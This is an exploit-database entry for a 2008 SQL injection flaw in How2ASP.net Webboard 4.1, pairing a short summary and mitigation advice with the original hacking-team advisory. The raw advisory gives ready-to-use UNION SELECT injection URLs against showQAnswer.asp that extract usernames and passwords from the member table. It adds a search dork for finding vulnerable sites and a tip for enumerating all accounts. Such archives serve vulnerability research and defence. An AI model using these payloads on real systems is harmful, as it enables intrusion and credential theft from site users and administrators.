How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability

vendor:

Webboard

by:

CWH Underground

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Webboard

Affected Version From: 4.1

Affected Version To: 4.1

Patch Exists: NO

Related CWE: N/A

CPE: a:how2asp.net:webboard:4.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability

A vulnerability exists in How2ASP.net Webboard 4.1 which allows an attacker to inject arbitrary SQL commands. An attacker can exploit this vulnerability by sending a specially crafted SQL statement to the vulnerable application. This can be done by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

==========================================================
               How2ASP.net Webboard 4.1             
           Remote SQL Injection Vulnerability             
==========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 17 May 2008
SITE   : www.citecclub.org


#####################################################
 APPLICATION : How2ASP.net Webboard   
 VERSION     : <= 4.1   #
 VENDOR      : http://howtoasp.net   
 DOWNLOAD    : http://howtoasp.net/dl/app/wb41/webboard41.zip
#####################################################


DORK: "Powered by How2asp"

---Exploit---

http://[target]/[path]/showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member%00

http://[target]/[path]/showQAnswer.asp?qNo=[SQL Statement]


---NOTE/TIP---

You must know what columns number that appear on pages, Insert username or password into columns number

You can enumerate all username and password use -> 

http://[target]/[path]/showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member
%20where%20Login%20not%20in%20('admin','test',....)%00

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################

# milw0rm.com [2008-05-17]